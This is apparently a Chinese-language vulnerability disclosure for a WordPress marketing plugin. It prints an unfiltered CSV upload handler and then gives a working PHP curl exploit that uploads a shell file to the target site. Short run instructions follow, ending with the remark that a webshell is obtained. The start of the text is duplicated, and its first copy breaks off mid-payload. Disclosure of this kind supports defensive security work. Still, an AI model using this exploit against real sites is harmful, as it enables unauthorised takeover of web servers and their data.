<ul><li>/admin/partials/csv_uploader.php<br></li></ul><pre class=""><?php $ds = DIRECTORY_SEPARATOR; //1 $storeFolder = 'uploaded_csv'; //2 if (!empty($_FILES)) { $_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', '', $_FILES['file']['name']); $_FILES['file']['name'] = preg_replace('/\s+/', '_', $_FILES['file']['name']); $tempFile = $_FILES['file']['tmp_name']; //3 $size = $_FILES['file']['size']; $targetPath = dirname( __FILE__ ) . $ds. $storeFolder . $ds; //4 $targetFile = $targetPath. $_FILES['file']['name']; //5 move_uploaded_file($tempFile,$targetFile); //6 $path = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; echo dirname($path)."/uploaded_csv/".$_FILES['file']['name']." ".$size; } ?> </pre><p>Csv_uploader.php没有做任何过滤,直接可以上传任意文件导致getshell。<br></p><p>利用payload:</p><pre class=""> <?php $postData = array(); $postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;) $dz = curl_init(); curl_setopt($dz, CURLOPT_URL,...
<ul><li>/admin/partials/csv_uploader.php<br></li></ul><pre class=""><?php $ds = DIRECTORY_SEPARATOR; //1 $storeFolder = 'uploaded_csv'; //2 if (!empty($_FILES)) { $_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', '', $_FILES['file']['name']); $_FILES['file']['name'] = preg_replace('/\s+/', '_', $_FILES['file']['name']); $tempFile = $_FILES['file']['tmp_name']; //3 $size = $_FILES['file']['size']; $targetPath = dirname( __FILE__ ) . $ds. $storeFolder . $ds; //4 $targetFile = $targetPath. $_FILES['file']['name']; //5 move_uploaded_file($tempFile,$targetFile); //6 $path = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; echo dirname($path)."/uploaded_csv/".$_FILES['file']['name']." ".$size; } ?> </pre><p>Csv_uploader.php没有做任何过滤,直接可以上传任意文件导致getshell。<br></p><p>利用payload:</p><pre class=""> <?php $postData = array(); $postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;) $dz = curl_init(); curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"); curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($dz, CURLOPT_POST, 1); curl_setopt($dz, CURLOPT_POSTFIELDS, $postData ); curl_setopt($dz, CURLOPT_TIMEOUT, 0); $buf = curl_exec ($dz); curl_close($dz); unset($dz); echo $buf; ?> </pre><p>运行:</p><pre class="">php payload.php</pre><p>得到webshell。</p><p></p><p><img alt="1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" src="https://images.seebug.org/@/uploads/1434392185703-1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" data-image-size="836,49"><br></p>
